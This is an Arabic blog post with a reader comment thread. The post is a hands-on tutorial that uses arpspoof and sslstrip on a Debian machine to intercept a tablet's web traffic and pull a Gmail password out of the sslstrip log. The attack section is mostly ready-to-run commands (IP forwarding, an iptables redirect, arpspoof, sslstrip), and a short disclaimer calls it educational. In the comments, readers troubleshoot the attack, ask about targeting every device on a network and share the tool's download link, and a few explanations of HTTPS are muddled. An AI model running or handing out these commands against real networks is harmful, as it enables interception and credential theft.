ArpSpoofing و SSlstrip في العمل.

مرحبًا أيها المدونون.

لدي اليوم عينة صغيرة توضح مدى خطورة الاتصال بأي شبكة بدون أمان تلك التي يحبها الكثير منا.

اليوم ، سأستخدم ArpSpoofing مع Sslstrip للحصول على كلمة مرور Gmail. لجعل البيئة أكثر تحكمًا ، قمت بإنشاء حساب يسمى "testarp@gmail.com".

وبما أنني لا أحب المقدمات كثيرًا ، فلنبدأ العمل.

لست مسؤولاً في أي وقت عما يمكنهم فعله بالمعلومات التالية. أفعل ذلك حصريًا للأغراض التعليمية

بيئة

ما لدينا لهذا الاختبار هو ما يلي:

1. المهاجم: إنه حاسوبي المكتبي أو المكتبي الذي يحتوي على Debian Wheezy. يمكنك تثبيت من المستودعات sslstrip y dsniff للحصول على arpspoofing

2 - الضحية: الضحية عبارة عن جهاز لوحي يعمل بنظام Android ويريد فقط رؤية بريده عبر المتصفح.

3. الوسيلة: الوسط هو بلدي راوتر سيسكو DPC2425

عناوين.

عنوان المهاجم: 172.26.0.2

عنوان جهاز التوجيه: 172.26.0.1

عنوان الضحية: 172.26.0.8

الهجوم:

لفهم كيفية عمل الهجوم أكثر قليلاً ، يمكنك الذهاب إلى مسننتي القديمة سأعين

أول شيء سنفعله لهذا الهجوم هو تنشيط التوجيه حتى يتمكن جهاز الكمبيوتر الخاص بنا من إعادة توجيه المعلومات إلى الضحية دون ملاحظته. (وإلا فسيكون هجوم رفض الخدمات)

لذلك سوف نستخدم:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

كل أمر في نافذة وحدة التحكم المباشرة.

الآن إذا قمنا بعمل tail -f من لينكس ، فإننا نرى المعلومات حية ومباشرة

 

لقطة 1

 

إذن كيف نحصل على ما نريد؟

دعنا أولاً ندخل بريدنا على الجهاز اللوحي. أثناء تسجيل الدخول ، نرى أن الآلاف والآلاف من الأشياء تظهر على وحدة التحكم الخاصة بنا.

الآن بعد أن انتهيت ، سنفتح ملفنا "desdelinux" باستخدام nano

nano desdelinux

باستخدام Control + W ، نبحث عن شيء يسمى البريد الآمن.

وسنرى شيئًا كهذا.

 

لقطة 2

 

من بين هذا الخط الضخم الذي لا يمكن رؤيته هو البريد الإلكتروني وكلمة المرور للضحية.

لذا نركض إلى اليمين حتى نرى الضوء في نهاية النفق.

 

لقطة 3

 

في مناسبة أخرى ، سنرى كيف يمكننا حماية أنفسنا قليلاً من هذه الهجمات.

تحياتي


محتوى المقال يلتزم بمبادئنا أخلاقيات التحرير. للإبلاغ عن خطأ انقر فوق هنا.

27 تعليقات ، اترك لك

اترك تعليقك

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها ب *

*

*

  1. المسؤول عن البيانات: ميغيل أنخيل جاتون
  2. الغرض من البيانات: التحكم في الرسائل الاقتحامية ، وإدارة التعليقات.
  3. الشرعية: موافقتك
  4. توصيل البيانات: لن يتم إرسال البيانات إلى أطراف ثالثة إلا بموجب التزام قانوني.
  5. تخزين البيانات: قاعدة البيانات التي تستضيفها شركة Occentus Networks (الاتحاد الأوروبي)
  6. الحقوق: يمكنك في أي وقت تقييد معلوماتك واستعادتها وحذفها.

  1.   تضمين التغريدة قال

    أغتنم هذه الفرصة لأقول إنه عندما تم نشر المنشور ، لم تكن الأوامر صحيحة.

    يفتقد الأمر iptables في النهاية إلى 8080 الموجود في سطر آخر. ثم كانت أوامر arpspoof كلها على نفس السطر. كل أمر في سطر مختلف.

    نأمل أن يراه المحرر ويمكنه إصلاحه.

    تحية.

    1.    مانويل دي لا فوينتي قال

      لقد أدخلت التصحيحات التي ذكرتها ، هل هذا جيد؟

      إذا كنت ستدخل رمزًا في الإدخال المفضل ، فاستخدم عرض HTML ، وتحقق من صحة المقالة قبل إرسالها إلى معلق. شكرا.

  2.   لويس قال

    إنه لأمر مخيف أن نعرف أن أولئك منا الذين ليس لديهم معرفة معرضون للخطر. معلومات جيدة جدًا حتى عندما أفهم القليل من الموضوع ، أدرك أهميته. شكرا!
    تحياتي

  3.   جيسكارد قال

    لكن هذا لا ينجح إلا إذا كان المهاجم والضحية على نفس الشبكة. على أي حال ، يبدو لي أنه إذا كنت (على نفس الشبكة) قمت بالاتصال باستخدام HTTPS ، فلن يحدث ذلك لأن البيانات مشفرة قبل مغادرة جهازك. إذا قمت بالاتصال عن طريق HTTP (بدون S) ، أعتقد أنه حتى عند النظر إلى كابل الشبكة ، فإنك ترى المفاتيح.

    1.    تضمين التغريدة قال

      هذا غير صحيح. أنا أخترق كلمة مرور gmail وإذا لاحظت أن gmail يستخدم https. وبالتالي؟ النقطة المهمة هي أنه على الرغم من أن https آمن ، إلا أنه يعتمد على http. لذلك فهي ليست آمنة.

      لا تعترف كثيرًا بشأن https أن S ليس لسوبرمان بل لـ "آمن"

    2.    RTen قال

      إنه يعمل مع https أو بدونه ، لقد جربته مع توزيعة linux أكثر تخصصًا ويعمل بدون مشاكل

    3.    مانويل دي لا فوينتي قال

      يمكنك استخدامه بدقة لتعليم أولئك الذين يسرقون شبكة Wi-Fi الخاصة بك درسًا. 😀

      إنه يشبه إلى حد ما ما قالوه منذ وقت طويل على مدونة Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    رايون قال

        Ostia ، رائع ما يفعله! / ثم يخبرونني بجنون العظمة في كل مرة أستخدم فيها VPN عندما يذهبون للتحقق من الحساب المصرفي ...). بالمناسبة ، عليك أن ترى مدى سخافة الأشخاص في التعليقات ... إذا كانت في النهاية تسرق ...

        1.    إليوتيمي 3000 قال

          نحتاج الآن إلى الحصول على برنامج تعليمي حول كيفية إنشاء وتقديم خدمة VPN الخاصة بك.

      2.    دانيال قال

        القصة التي تربطها ممتعة للغاية ، حتى أنها تبدو جديرة بكتاب جديد ، وهذا يجعلني أتذكر عندما استخدمت الإنترنت لجيراني ، وعلى الرغم من أنني أقول أنني أعرف الموضوع ، أعتقد أنني لم أستطع أبدًا رؤية الأبعاد الحقيقية للخطر الذي يمكن أن أتعرض له أخيرًا ، لحسن الحظ بالنسبة لي ، قاموا فقط بتغيير كلمة المرور إلى WPA2 وهنا بدأت قصتي مع مزود خدمة الإنترنت.

    4.    موريشيوس قال

      لهذا السبب يقول العنوان Sslstrip في العمل.

      إنها تعمل طالما أن المهاجم في المنتصف

  4.   حالا قال

    ما الموجة التي تعمل بها في المنشور؟ -.-
    لا.
    ماذا تنتظر لإرسال طلبك XD
    تحياتي
    وظيفة جيدة

  5.   AurosZx قال

    مثير للاهتمام ، سأجري اختبارًا تعليميًا لاحقًا ... ربما يمكنني حتى إزالة كلمة المرور الخاصة بشبكة WiFi والاستمتاع قليلاً 😛
    بأي حال من الأحوال ، هل يمكنك فعل شيء مشابه لإرسال صفحات مختلفة إلى تلك التي طلبها الهدف؟ على سبيل المثال ، يريدون فتح Facebook وأعيد توجيههم إلى Google؟ 😛

    1.    تضمين التغريدة قال

      نعم. لكنها كلها لفة مختلفة تمامًا.

      ربما سأقوم بنشره لاحقًا.

  6.   lastnewbie قال

    منشور جيد جدًا ، هذه الموضوعات تعليمية للغاية ، والآن نحتاج إلى أن نكون قادرين على مواجهة هذا الهجوم ، نظرًا لأن البعض (مثلي) يتصلون بالشبكات العامة (الجامعة على سبيل المثال) سيكون من المفيد تجنب ذلك.

    تحيات!

  7.   مجرد مستخدم آخر dl قال

    لم ينجح معي 🙁

  8.   woqer قال

    لقد فشلني شيء ما هنا ، بصرف النظر عن حقيقة أن اتصالات https يتم تشفيرها من خلال شهادة خادم (بمجرد حصولك على الشهادة على جهازك ، يكون متصفحك مسؤولاً عن التشفير) باستخدام iptables ، فأنت تعيد توجيه المنفذ 80 (http) ، وليس 443 وهو https

    1.    تضمين التغريدة قال

      اعتقدت ذلك أيضا. النقطة المهمة هي أنه على الرغم من أن https "آمن" إلا أنه للأسف يعتمد على http. لذلك يستفيد sslstrip من ذلك ، فهو يجعل المتصفح يعتقد أنه يستخدم بيانات اعتماد https ولكنه ليس كذلك.

      1.    woqer قال

        القرف المقدس! ولكن يجب أن يرى المتصفح تحذيرًا مثل "تأتي هذه الشهادة من موقع مشبوه أو شيء من هذا القبيل" ... سأضطر بالتأكيد إلى إجراء اختبارات XD

        1.    تضمين التغريدة قال

          لا ، لا شيء على الإطلاق يخرج.

  9.   مجرد مستخدم آخر dl قال

    لقد نجحت أخيرًا بالنسبة لي
    أنا متصل على شبكة WEP بكلمة مرور ، وأظهر لي كلمة المرور مباشرة على أي حال.

    استعلام. هل يمكنك القيام بهذا الإجراء نفسه ولكن لجميع أجهزة الكمبيوتر المتصلة بالشبكة ، بدلاً من وجود ضحية واحدة؟

    1.    تضمين التغريدة قال

      نعم يمكنك ذلك. لكني لم أقم بإجراء تجارب. جربه بنفسك وأخبرنا كيف حالك.

  10.   سينيك 19 قال

    الشيء الوحيد الذي أحصل عليه مع هذا هو أن آلة الضحية تصبح غير متصلة بالإنترنت ، لكن sslstrip لا تظهر لي أي شيء: /

    1.    تضمين التغريدة قال

      تحتاج إلى تعطيل جدار الحماية للحظة. أو على الأقل تمكين الاتصالات الواردة.

  11.   السيد بلاك قال

    لم أتمكن من رؤية سوى اسم المستخدم وكلمة المرور لصفحة facebook ، ولم أجد في gmail أي نتائج في السجل ، كما أنني كنت بحاجة فقط إلى سطر من arpspoof «arpspoof -i -t». من ناحية أخرى ، لم يتمكن الجهاز المصاب من فتح بعض الصفحات. سأستمر في التحقيق ، إنه ممتع للغاية. مساعدة لأولئك الذين يستخدمون Manjaro ، الحزم المراد تثبيتها هي: dsniff (هنا arpspoff) و twisted و python2-pyopenssl. يمكن تنزيل Sslstrip من هنا: http://www.thoughtcrime.org/software/sslstrip/
    لتشغيله $ python2 sslstrip.py
    تحية.

  12.   السيد بلاك قال

    لم يخرج ولكن خط arpspoof هو: #arpspoof -i int -t ip-ضحايا ip-router

  13.   جيلبرت قال

    انظر أفعل بالضبط ما تقوله:

    صدى "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT-to-port 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    المشكلة هي أن الضحية ، وهو جهاز كمبيوتر آخر موجود في غرفتي هنا ، تُركت بدون اتصال لدرجة أنه يتعين علي إعادة تشغيل جهاز التوجيه ، فماذا يمكنني أن أفعل ، ومساعدتي.

    شيء آخر أعمل به مع آلة افتراضية ، وعندما أقوم بتنفيذ الأمر iwconfig ، لا يظهر wlan0 ، ولا عندما أقوم بتنفيذ ifconfig ، ولكن إذا كان لدي إنترنت على جهازي الظاهري ، فماذا باستخدام واجهة eth0.